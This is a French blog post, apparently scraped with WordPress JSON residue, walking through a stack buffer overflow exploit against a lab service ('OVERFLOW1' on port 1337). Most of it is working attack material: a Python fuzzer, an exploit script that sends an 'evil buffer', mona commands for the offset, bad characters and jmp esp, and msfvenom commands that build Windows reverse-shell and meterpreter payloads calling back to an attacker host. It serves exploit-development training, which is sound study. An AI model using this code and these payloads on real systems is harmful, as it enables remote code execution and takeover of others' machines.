On va utiliser immunity debugger avec le plugin mona<\/p>\n
Fuzzer (on essaie de crasher l’application en augmentant gradullement la taille du buffer) On peut commencer \u00e0 \u00e9crire l’exploit On g\u00e9n\u00e8re un buffer de taille de 400 octets de plus que la taille du buffer qui a fait crash\u00e9 l’application<\/p>\n \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 2400. On met le buffer dans le payload et on ex\u00e9cute l’exploit. Avec mona, on trouve la taille exacte du buffer qui a fait crash\u00e9 l’application pour le controle du registre eip<\/p>\n On regarde les logs pour trouver ce message : EIP contains normal pattern : … (offset xxxx). On r\u00e8gle la variable offset dans le code de l’exploit. On met CCCC dans la variable retn, payload=”” et on ex\u00e9cute \u00e0 nouveau l’exploit. L’application va planter et eip aura la valeur 0xCCCC. <\/p>\n Trouver les Bad Characters<\/strong><\/p>\n Il y a des caract\u00e8res qui ne pourront appara\u00eetre dans le code de notre exploit (comme le null byte et possiblement quelques autres)<\/p>\n G\u00e9n\u00e9ration d’un tableau initial de caract\u00e8res valides on met ces octets dans la variable exploit et on compare le r\u00e9sultat(sur la pile) apr\u00e8s le crash avec le tableau initial<\/p>\n On va voir dans la fen\u00eatre popup le r\u00e9sultat de la comparaison. Nous voyons le caract\u00e8re NULL et quelques autres. Certains de ces caract\u00e8res sont r\u00e9ellement des mauvais caract\u00e8res , mais pas tous. Nous notons ces caract\u00e8res (possibly bad chars dans la fen\u00eatre). Nous modifions le contenu de la variable exploit (enlevons un autre possible mauvais caract\u00e8re), reg\u00e9n\u00e9rons le tableau bytearray avec mona et r\u00e9essayons pour voir quels sont les mauvais caract\u00e8res. ainsi de suite…<\/p>\n Nous trouvons un instruction “jmp esp”<\/p>\n Mettre une adresse trouv\u00e9e dans la variable retn (ne pas oublier little endian)<\/p>\n G\u00e9n\u00e9rer le payload<\/p>\n Truc: on met la sortie dans le placeholder ici <\/p>\n Ajouter quelques octets pour le d\u00e9code du payload<\/p>\n Have fun!<\/p>\n","protected":false},"excerpt":{"rendered":" On va utiliser immunity debugger avec le plugin mona !mona config -set workingfolder c:\\mona\\%p Fuzzer (on essaie de crasher l’application en augmentant gradullement la taille du buffer) #!\/usr\/bin\/env python3 import socket, time, sys ip = "10.10.95.149" port = 1337 timeout = 5 prefix = "OVERFLOW1 " string = prefix + "A" * 100 while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) print("Fuzzing with {} bytes".format(len(string) – len(prefix))) s.send(bytes(string, "latin-1")) s.recv(1024) except: print("Fuzzing crashed at {} bytes".format(len(string) – len(prefix))) sys.exit(0) string += 100 * "A" time.sleep(1) On peut commencer \u00e0 \u00e9crire l’exploit import socket ip = "10.10.95.149" <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"yoast_head":"\n!mona config -set workingfolder c:\\mona\\%p<\/code><\/p>\n
\n#!\/usr\/bin\/env python3\n\nimport socket, time, sys\n\nip = "10.10.95.149"\n\nport = 1337\ntimeout = 5\nprefix = "OVERFLOW1 "\n\nstring = prefix + "A" * 100\n\nwhile True:\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.settimeout(timeout)\n s.connect((ip, port))\n s.recv(1024)\n print("Fuzzing with {} bytes".format(len(string) - len(prefix)))\n s.send(bytes(string, "latin-1"))\n s.recv(1024)\n except:\n print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))\n sys.exit(0)\n string += 100 * "A"\n time.sleep(1)<\/code><\/pre><\/p>\n
\nimport socket\n\nip = "10.10.95.149"\nport = 1337\n\nprefix = "OVERFLOW1 "\noffset = 0\noverflow = "A" * offset\nretn = ""\npadding = ""\npayload = ""\npostfix = ""\n\nbuffer = prefix + overflow + retn + padding + payload + postfix\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ntry:\n s.connect((ip, port))\n print("Sending evil buffer...")\n s.send(bytes(buffer + "\\r\\n", "latin-1"))\n print("Done!")\nexcept\n print("Could not connect.")<\/code><\/pre><\/p>\n!mona findmsp -distance 2400<\/code><\/p>\n!mona bytearray -b "\\x00"<\/code><\/p>\n
\nfor x in range(1, 256):\n print("\\\\x" + "{:02x}".format(x), end='')\nprint()<\/code><\/pre><\/p>\n!mona compare -f c:\\mona\\oscp\\bytearray.bin -a bytearray.bin -a esp_address<\/code><\/p>\n!mona jmp -r esp -cpb "\\x00"<\/code> #entrer les mauvais caract\u00e8res…<\/code><\/p>\nmsfvenom -p windows\/shell_reverse_tcp LHOST=10.9.0.24 LPORT=4444 EXITFUNC=thread -b "\\x00" -f c #ne pas oublier les mauvais caract\u00e8res\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.9.0.24 LPORT=443 -f c =a x86 --platform windows -b "\\x00\\x0a" -e x86\/shikata_ga_nai #2e possibilit\u00e9\n<\/code><\/pre><\/p>\npayload= ( <--ici--> )<\/code> #cela nous \u00e9vite la modification du code de msfvenom<\/p>\npadding = "\\x90" * 16<\/code><\/p>\n